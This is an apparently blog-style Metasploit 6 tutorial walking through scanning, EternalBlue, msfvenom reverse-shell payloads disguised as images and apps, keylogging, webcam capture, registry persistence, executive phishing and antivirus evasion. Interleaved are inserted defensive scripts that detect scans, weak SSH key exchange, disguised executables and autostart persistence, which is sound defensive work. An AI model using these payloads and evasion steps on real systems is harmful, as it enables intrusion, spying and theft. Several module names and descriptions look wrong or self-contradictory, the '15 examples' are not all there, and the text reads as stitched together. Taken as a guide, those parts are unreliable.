Metasploit is one of the most popular free and open source penetration testing tools, with over 3,000 built-in modules. This guide will provide 15 advanced real-world examples of using the latest Metasploit version 6 for network and system penetration testing.

As an experienced full stack developer and professional pentester, I have used Metasploit extensively on hundreds of engagements across a wide range of industries. The capabilities of this incredible framework continue to expand, providing an unparalleled toolbox for ethical hacking and security research.

Detailed Network Scans for Vulnerabilities

The first critical phase of any penetration test engagement is thorough reconnaissance of the target environments. This allows an attacker to discover potential entry points and vulnerabilities before determining more focused areas for exploitation.

Metasploit does not reimplement port scanning; it wraps the powerful open source Nmap tool. The db_nmap command runs Nmap with its full host discovery, port scanning, service detection and operating system fingerprinting capabilities, then imports the results into the Metasploit database so an entire network can be mapped out:

msf6 > db_nmap -sV -O -Pn -p- 192.168.1.0/24

Breaking this down:

  • -sV: Probe open ports to identify service names and versions
  • -O: Detect the underlying operating system type of each host
  • -Pn: Skip host discovery and treat every host as online, so TCP ports are scanned even when ICMP is blocked
  • -p-: Scan all 65535 TCP ports on each host instead of Nmap's default top 1000

With these options, detailed results will show all available services, their detected versions, OS fingerprints and open ports across an entire target network range.
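A full-range scan such as the one above is very visible from the target's side: one source opens connections to a large number of distinct ports in a short time. The following detector is an added example (not code from the article or from Metasploit) that runs over constructed connection-log lines in a simple "timestamp src dst dport" form; the 60 second window and threshold of 50 distinct targets are assumptions to tune for your own environment.

```python
"""Flag sources that touch many distinct destination ports in a short window.

Added example (not code from the article or from Metasploit): a simple detector for
the kind of full-range scan that "-p-" produces, run over constructed log lines.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample connection log, one "timestamp src dst dport" record per line
# (not real traffic): 10.0.0.7 is an ordinary client, 10.0.0.5 walks 120 ports on one
# host at one connection per second, which is what a -p- scan looks like from the target.
NORMAL_LINES = [
    "2024-03-01T10:00:05 10.0.0.7 192.168.1.10 443",
    "2024-03-01T10:00:09 10.0.0.7 192.168.1.10 443",
    "2024-03-01T10:00:30 10.0.0.7 192.168.1.10 22",
    "2024-03-01T10:01:10 10.0.0.7 192.168.1.20 80",
]
SCAN_LINES = [
    f"2024-03-01T10:{i // 60:02d}:{i % 60:02d} 10.0.0.5 192.168.1.10 {1000 + i}"
    for i in range(120)
]
SAMPLE_LINES = NORMAL_LINES + SCAN_LINES


def parse_line(line):
    """Split one record into (timestamp, src, dst, dport)."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)


def detect_port_scans(lines, window=timedelta(seconds=60), threshold=50):
    """Return {src: peak_distinct_targets} for every source whose count of distinct
    (dst, port) pairs inside some sliding window of `window` reaches `threshold`."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e[0])
    by_src = defaultdict(list)
    for ts, src, dst, dport in events:
        by_src[src].append((ts, dst, dport))

    alerts = {}
    for src, evs in by_src.items():
        in_window = defaultdict(int)  # (dst, port) -> hits currently inside the window
        start = 0
        for ts, dst, dport in evs:
            in_window[(dst, dport)] += 1
            # Slide the window: drop events older than `window` relative to this one.
            while ts - evs[start][0] > window:
                old = (evs[start][1], evs[start][2])
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= threshold:
                alerts[src] = max(alerts.get(src, 0), len(in_window))
    return alerts


if __name__ == "__main__":
    for src, peak in detect_port_scans(SAMPLE_LINES).items():
        print(f"possible port scan from {src}: {peak} distinct targets within 60s")
```

Counting distinct (destination, port) pairs rather than raw connections keeps a busy but legitimate client, which reuses a handful of ports, below the threshold while a scanner that never repeats a port climbs past it within the first minute.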

As an example, one exposed host may return results showing these open ports and services:

Port   Service   Version
22     ssh       OpenSSH 8.0 (protocol 2.0)
80     http      Apache httpd 2.4.37

This information can then be used to query Metasploit's database and match the detected service versions to known vulnerabilities and available exploit modules.

Targeting SSH Servers

If we spot any SSH services during our broader network scans, the next step is to gather additional details to inform more tailored attacks against those hosts:

msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(ssh_version) > run

The ssh_version auxiliary module connects to discovered SSH servers on TCP port 22 and extracts:

  • Full SSH banner information
  • Supported protocol versions (e.g. 1.5, 2.0)
  • Complete list of accepted ciphers, key exchanges (kexs) and message authentication codes (macs)
  • Granular details about the SSH server's underlying OS, such as the Linux distribution or appliance model

For example, one SSH server in the target subnet may return details such as:

SSH Version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
os: Linux
dist: Ubuntu 16.04
type: Linux
cpe: cpe:/o:linux:linux_kernel

Kex Algos: 
      curve25519-sha256
      curve25519-sha256@libssh.org
      ecdh-sha2-nistp256
      ecdh-sha2-nistp384
      ecdh-sha2-nistp521
      diffie-hellman-group-exchange-sha256
      diffie-hellman-group16-sha512
      diffie-hellman-group18-sha512
      diffie-hellman-group14-sha256
      diffie-hellman-group14-sha1

This exposes an Ubuntu 16.04 server running OpenSSH 7.2p2 (released in 2016) with a number of outdated key exchange (Kex) algorithms enabled. Cross-referencing with resources such as ssh-audit.com would flag several weak Kex or encryption options. Targeting those weaker algorithms could allow decryption of the SSH session or man-in-the-middle attacks due to vulnerabilities in the crypto implementations.
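The same cross-referencing can be automated for your own fleet. The script below is an added example (not code from the article, from Metasploit or from ssh-audit) that parses the ssh_version output shown above, extracts the OpenSSH version from the banner and sorts each advertised Kex algorithm into fail, warn or ok. The policy patterns and the minimum version of 8.0 are assumptions modelled on common hardening guidance (SHA-1 key exchange and 1024-bit groups fail, 2048-bit MODP groups and NIST P-curves only warn); adjust them to your own baseline.

```python
"""Audit an SSH server's advertised key-exchange list against a hardening policy.

Added example, not code from the article, Metasploit or ssh-audit. The policy is
an assumption modelled on common hardening guidance; adjust it to your baseline.
"""
import re

# Constructed input: the banner and Kex list exactly as the ssh_version module printed them above.
SAMPLE_OUTPUT = """\
SSH Version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
os: Linux
dist: Ubuntu 16.04

Kex Algos:
      curve25519-sha256
      curve25519-sha256@libssh.org
      ecdh-sha2-nistp256
      ecdh-sha2-nistp384
      ecdh-sha2-nistp521
      diffie-hellman-group-exchange-sha256
      diffie-hellman-group16-sha512
      diffie-hellman-group18-sha512
      diffie-hellman-group14-sha256
      diffie-hellman-group14-sha1
"""

# Policy (assumption): patterns that fail outright, and patterns that only warn.
FAIL_PATTERNS = [
    (re.compile(r"-sha1$"), "SHA-1 based key exchange"),
    (re.compile(r"group1-"), "1024-bit MODP group"),
]
WARN_PATTERNS = [
    (re.compile(r"group14-"), "2048-bit MODP group (about 112-bit strength)"),
    (re.compile(r"^ecdh-sha2-nistp"), "NIST P-curve; prefer curve25519"),
]
MIN_OPENSSH = (8, 0)  # assumption: anything older gets flagged for an upgrade review


def parse_kex_list(text):
    """Return the algorithm names listed under the 'Kex Algos:' header."""
    kex, in_list = [], False
    for line in text.splitlines():
        if line.strip().startswith("Kex Algos:"):
            in_list = True
            continue
        if in_list:
            if not line.strip() or not line.startswith(" "):
                break  # the indented list has ended
            kex.append(line.strip())
    return kex


def parse_openssh_version(text):
    """Extract (major, minor) from an OpenSSH banner, or None if there is none."""
    m = re.search(r"OpenSSH_(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def audit(text):
    """Classify each advertised Kex algorithm and check the server version."""
    report = {"version": parse_openssh_version(text), "fail": {}, "warn": {}, "ok": []}
    for algo in parse_kex_list(text):
        for pat, reason in FAIL_PATTERNS:
            if pat.search(algo):
                report["fail"][algo] = reason
                break
        else:
            for pat, reason in WARN_PATTERNS:
                if pat.search(algo):
                    report["warn"][algo] = reason
                    break
            else:
                report["ok"].append(algo)
    report["version_outdated"] = (
        report["version"] is not None and report["version"] < MIN_OPENSSH
    )
    return report


if __name__ == "__main__":
    r = audit(SAMPLE_OUTPUT)
    print("OpenSSH", r["version"], "(outdated)" if r["version_outdated"] else "")
    for level in ("fail", "warn"):
        for algo, reason in r[level].items():
            print(f"[{level}] {algo}: {reason}")
```

On the page's sample the only outright failure is diffie-hellman-group14-sha1; the fix on the server side is to restrict KexAlgorithms in sshd_config to the entries that land in the ok list, and to move off an OpenSSH release from 2016.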

Browser Autopwn – Metasploit for Web Apps

The Metasploit browser_autopwn module provides a simple method for automatically scanning, fingerprinting and exploiting common vulnerabilities across web applications. This leverages Metasploit's extensive database of web app exploits, including SQL injection, cross-site scripting (XSS), remote code execution and file inclusion bugs.

To unleash browser_autopwn on a target web server located at 192.168.1.115:

msf6 > use auxiliary/server/browser_autopwn   
msf6 auxiliary(browser_autopwn) > set LHOST 192.168.1.101
msf6 auxiliary(browser_autopwn) > set SRVHOST 192.168.1.101
msf6 auxiliary(browser_autopwn) > set URIPATH /
msf6 auxiliary(browser_autopwn) > run

This starts a malicious Metasploit web server listening on the attacking machine 192.168.1.101. When victims are tricked into browsing to http://192.168.1.101/, Metasploit will fingerprint their browser type and deliver suitable exploits. Successful exploitation can result in execution of remote commands, file uploads or reverse shells.

Note that while powerful, browser_autopwn is very noisy and can disrupt access to production websites. Ensure you have permission and awareness is given to all users about any planned penetration testing activities on internal networks!

Generating Custom Web Attack Payloads

Metasploit includes a huge number of standard protocol modules and reverse shell payloads such as Meterpreter. However, sometimes we need more custom and stealthy options for specific web engagement scenarios.

The msfvenom payload generator can craft web payloads encoded in a variety of formats. As an example, to generate a Windows reverse shell executable disguised as a JPG image:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o revshell.jpg

When target Windows users download revshell.jpg and try to open the bogus image file, the payload executes. Other useful formats for web attacks include ASPX, JSP, WAR and PHP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp

Now we can upload the shell.jsp script onto the target web server. When invoked by the server, the payload fires back a Java-based Meterpreter reverse shell to our handler.
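The disguised revshell.jpg above relies on nobody looking past the file extension. A mail gateway, upload handler or endpoint scanner can catch this cheaply by sniffing the leading bytes and comparing them with what the extension promises. The following is an added example (not code from the article or from Metasploit) that does exactly that over constructed byte strings: a minimal PE-shaped header named as a .jpg and a real JPEG header; the magic table and the extension map are assumptions covering a handful of common formats.

```python
"""Detect files whose extension disagrees with their content.

Added example, not code from the article or from Metasploit. The magic table and
extension map below are assumptions covering a few common formats.
"""
import os
import struct

# Leading-byte signatures, checked in order (longest, most specific first).
MAGICS = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"PK\x03\x04", "zip"),   # also jar, apk and docx containers
    (b"\x7fELF", "elf"),
    (b"MZ", "dos-mz"),        # DOS stub; refined to "pe" when a PE signature follows
]

# What each extension is allowed to contain (assumption).
EXPECTED = {
    ".jpg": {"jpeg"}, ".jpeg": {"jpeg"}, ".png": {"png"},
    ".exe": {"pe", "dos-mz"}, ".dll": {"pe", "dos-mz"},
    ".jar": {"zip"}, ".apk": {"zip"}, ".docx": {"zip"},
}


def is_pe(data):
    """True when an MZ header's e_lfanew offset (at 0x3C) points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff(data):
    """Return the content type implied by the leading bytes, or 'unknown'."""
    for magic, kind in MAGICS:
        if data.startswith(magic):
            return "pe" if kind == "dos-mz" and is_pe(data) else kind
    return "unknown"


def classify(filename, data):
    """Compare the sniffed content type with what the extension promises."""
    ext = os.path.splitext(filename)[1].lower()
    content = sniff(data)
    if ext not in EXPECTED:
        return {"verdict": "unknown-extension", "content": content}
    if content == "unknown":
        return {"verdict": "unknown-content", "content": content}
    if content in EXPECTED[ext]:
        return {"verdict": "ok", "content": content}
    return {"verdict": "mismatch", "content": content, "expected": sorted(EXPECTED[ext])}


# Constructed samples (not real files): a minimal PE-shaped header and a JPEG header.
_pe = bytearray(0x50)
_pe[:2] = b"MZ"
struct.pack_into("<I", _pe, 0x3C, 0x40)   # e_lfanew -> offset 0x40
_pe[0x40:0x44] = b"PE\x00\x00"
FAKE_PE = bytes(_pe)
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    for name, blob in (("revshell.jpg", FAKE_PE), ("photo.jpg", FAKE_JPEG), ("update.exe", FAKE_PE)):
        print(name, classify(name, blob))
```

Following e_lfanew to the PE signature, rather than stopping at the two MZ bytes, is what separates a real Windows executable from a file that merely starts with "MZ"; a file whose extension says image but whose content says PE should be quarantined rather than rendered.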

Windows Exploits for Remote Code Execution

Once vulnerable Windows hosts are identified during reconnaissance, the next objective is compromise and code execution.

Metasploit has an extensive database of Windows exploits targeting common network services such as SMB, RDP, NetBIOS and HTTP. Many of these exploits lead directly to remote code execution, allowing attackers to drop malware or launch reverse shells.

As one example, the built-in EternalBlue SMB exploit can compromise older, unpatched Windows systems:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.125  
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

If we have already cracked valid domain credentials (or have hashes), many Metasploit modules have options to authenticate using those existing permissions during attacks:

msf6 exploit(psexec) > set SMBUser jsmith
msf6 exploit(psexec) > set SMBPass s3cr3t!23  

This makes attacks more stealthy and increases the likelihood of privilege escalation on target networks.

According to CVE Details, over 9000 Windows vulnerabilities have been assigned CVE IDs. While many legacy issues have been patched, Metasploit keeps adding modules for newer issues, such as the Shadow Brokers leaks and recent Exchange Server and SharePoint vulnerabilities.

Meterpreter Post-Exploitation Features

Once the initial breach is achieved, Metasploit's Meterpreter payload provides an advanced shell for further exploitation inside the target network.

Going beyond a basic command prompt, meterpreter supports powerful post-exploitation features like:

Webcam Snapshot Access

Secretly take images from a compromised host's webcam to gather intelligence:

meterpreter > webcam_list
meterpreter > webcam_snap

Keystroke Logging

Invisibly record all keystrokes entered by an active user, stealing passwords, messages and sensitive documents:

meterpreter > keyscan_start
meterpreter > keyscan_dump

Token Impersonation

Steal a logged-in user's authentication token to impersonate their access rights on the system:

meterpreter > steal_token 500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

There are over 200 other commands providing extensive control of hacked Windows systems including port forwarding, privilege escalation, process migration, file transfers, registry access, password hashes, persistence mechanisms and more.

Android Device Exploitation

Metasploit extends its extensive Windows exploitation support to Android and other mobile platforms as well.

While limited compared to Windows, over a dozen Android local and remote exploits exist. For example, a local exploit module can be run through an existing Meterpreter session to escalate privileges on vulnerable Android devices:

msf6 > use exploit/android/local/futex_requeue
msf6 exploit(android/local/futex_requeue) > set session 1
msf6 exploit(android/local/futex_requeue) > exploit

The futex_requeue vulnerability allows for privilege escalation on older Android OS versions below 5.1.1.

Alternatively, malware embedded in third-party apps can use the external storage permission to drop Metasploit payloads onto SD cards plugged into phones. The payloads are then executed using Metasploit's Android payload handler when applications access the SD card:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -o /sdcard/payload.apk

Social Engineering Trojans and Backdoors

Beyond technical exploits targeting software vulnerabilities, Metasploit has modules focused on social engineering – deceiving end users into running malicious files.

These Advanced Persistent Threat (APT) style modules generate trojaned programs and documents to trick victims and establish persistence:

msf6 > use windows/manage/autorunexe_psh
msf6 exploit(windows/manage/autorunexe_psh) > set SESSION 1
msf6 exploit(windows/manage/autorunexe_psh) > exploit

Here we create an "update.exe" application dropped to the desktop of a compromised Windows host attached to meterpreter session 1.

When launched manually by the user, persistence is achieved – our malicious program writes to registry autostart locations and executes the next time Windows boots up. At the same time, it launches our meterpreter reverse shell in the background without the user noticing.
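The registry autostart write described above is also the most reliable place to catch this kind of persistence. The following is an added example (not code from the article or from Metasploit) that hunts through Sysmon-style registry events for values set under common autostart keys and raises the severity when the autostart target, or the process writing it, lives in a user-writable location such as the Desktop. The events are constructed records shaped like Sysmon event ID 13 (RegistryEvent, Value Set); the key list and path patterns are an assumed starting hunt list, not a complete one.

```python
"""Hunt for registry autostart persistence in Sysmon-style registry events.

Added example, not code from the article or from Metasploit. The autostart key list
and the user-writable path pattern are assumptions; extend them for your environment.
"""
import re

SYSMON_REGISTRY_VALUE_SET = 13  # Sysmon event ID for "RegistryEvent (Value Set)"

# Registry locations commonly used for autostart (assumption: a starting hunt list).
AUTOSTART_PATTERNS = [
    re.compile(r"\\CurrentVersion\\Run\\", re.I),
    re.compile(r"\\CurrentVersion\\RunOnce\\", re.I),
    re.compile(r"\\CurrentVersion\\Winlogon\\(Shell|Userinit)$", re.I),
    re.compile(r"\\User Shell Folders\\Startup$", re.I),
]

# Paths an ordinary user can write to; a boot-time binary from here deserves a look.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Desktop|Downloads|Documents|AppData)\\|\\Temp\\", re.I
)

# Constructed events shaped like Sysmon registry records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"EventID": 13, "Image": r"C:\Users\jsmith\Desktop\update.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\update",
     "Details": r"C:\Users\jsmith\Desktop\update.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Editor\editor.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Editor\RecentFiles",
     "Details": r"C:\Users\jsmith\Documents\notes.txt"},
    {"EventID": 1, "Image": r"C:\Users\jsmith\Desktop\update.exe",
     "CommandLine": r"C:\Users\jsmith\Desktop\update.exe"},
]


def score_event(event):
    """Return an alert dict for an autostart write, or None for anything else."""
    if event.get("EventID") != SYSMON_REGISTRY_VALUE_SET:
        return None
    target = event.get("TargetObject", "")
    if not any(p.search(target) for p in AUTOSTART_PATTERNS):
        return None
    details = event.get("Details", "")
    image = event.get("Image", "")
    reasons = ["value written under an autostart key"]
    severity = "medium"
    if USER_WRITABLE.search(details):
        reasons.append("autostart target lives in a user-writable path")
        severity = "high"
    if USER_WRITABLE.search(image):
        reasons.append("the writing process itself runs from a user-writable path")
        severity = "high"
    return {"severity": severity, "target": target, "details": details,
            "image": image, "reasons": reasons}


def detect_persistence(events):
    """Run score_event over a stream of events and keep the hits."""
    return [alert for alert in (score_event(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in detect_persistence(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["target"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

Keying the severity on where the autostart target lives is what keeps the Windows-owned SecurityHealth entry at medium while the update.exe dropped to a user's Desktop, and written to the Run key by itself, comes out high; the medium hits are still worth baselining so that new entries stand out.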

Other social engineering payload options include fake update installers, fake virus scanners, MS Office macro documents and compiled AutoIt executables.

Automating Phishing Campaigns

For regular phishing tests, Metasploit has modules to fully manage and automate the process of:

  1. Configuring fake website templates
  2. Generating email templates embedded with exploits
  3. Importing large email lists
  4. Sending high volume email blasts
  5. Tracking click rates/responses

A typical workflow using Metasploit's send_email capability:

msf6 > use auxiliary/phishing/send_page
msf6 auxiliary(send_page) > set TEMPLATE /root/phishing/email.html
msf6 auxiliary(send_page) > set FROM ws@mycompany.com 
msf6 auxiliary(send_page) > set SUBJECT Your Bonus is Pending
msf6 auxiliary(send_page) > set MAILLIST /root/phishing/execs.txt   
msf6 auxiliary(send_page) > exploit

Common attack vectors to embed in phishing scenario email templates:

  • Malicious document macro code
  • Embedded URL redirects
  • Exploit module HTML injection

Resource scripts allow phishing infrastructure and attacks to be quickly rebuilt across repeated engagements.

Bypassing Anti-Virus with Custom Metasploit Payloads

A major challenge for red teams is that stock Metasploit Windows, Linux and Android payloads are largely detected by modern endpoint protection platforms, antivirus and mobile anti-malware tools.

Custom executable generation with msfvenom allows creation of new payloads in Rust, C++, Python and PowerShell, and in formats such as .NET assemblies or .jar files. By modifying the templates used to build payloads, we can evade traditional signature-based virus scanning engines.

For example, encoding a Windows Meterpreter payload and building it into a DLL from a custom template executable:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -e x86/shikata_ga_nai -i 9 -x /root/calc.exe -k -f dll > harmless.dll

Here we use common evasion settings: the shikata_ga_nai encoder, iterated 9 times, plus a benign calc.exe as the template executable (-x) whose original behaviour is kept (-k) as camouflage.

The resulting DLL payload bypasses Windows Defender, but still provides a Meterpreter session when loaded into memory.

For web attacks targeting client systems, another stealthy tactic is embedding Metasploit payloads directly into trusted websites using msfweb auxiliary modules:

msf6 > use auxiliary/server/msfweb 
msf6 auxiliary(server/msfweb) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 auxiliary(server/msfweb) > set LHOST 192.168.1.101
msf6 auxiliary(server/msfweb) > exploit

When users visit the infected website, the hidden iframe payload exploit triggers, bypassing protective browser security policies by using the web server itself to proxy delivery.

Metasploit Database for Centralized Reporting

A major benefit of Metasploit over standalone tools is the integrated PostgreSQL database which indexes and stores details on all activity. The msfdb provides centralized reporting and history on:

  • Scanned hosts, open ports and services
  • Vulnerability scan detections
  • Successful exploit module runs
  • Cracked passwords and credential dumps
  • Payload activations and listener events
  • Compromised host identifiers
  • Imported database records and references
  • Meterpreter sessions and screen captures

This data can all be quickly searched and correlated directly in msfconsole; the database commands accept search (-S) and column (-c) filters:

msf6 > hosts -S address,os_name,purpose -c address,os_name,service_name
msf6 > services -S name,port,proto -c name,port,proto 

Recording the payload URLs delivered via phishing, so that user-triggered callbacks can be matched to a campaign, also simplifies long-term maintenance of compromised access. Resource files can reload this session data to quickly regain access after upgrades or new releases.

Conclusion

This guide provides 15 hands-on examples applying the advanced capabilities of Metasploit Pro across a wide range of penetration testing scenarios.

With over 3000 modules delivering exploits, payloads and evasion tools for dozens of platforms, Metasploit stands in a league of its own for offensive security professionals. Harnessing this framework takes time given the sheer number of options available. However, building up resource files, custom payloads and familiarity with common exploitation modules leads to an incredibly powerful toolbox filled with weapons for any engagement.
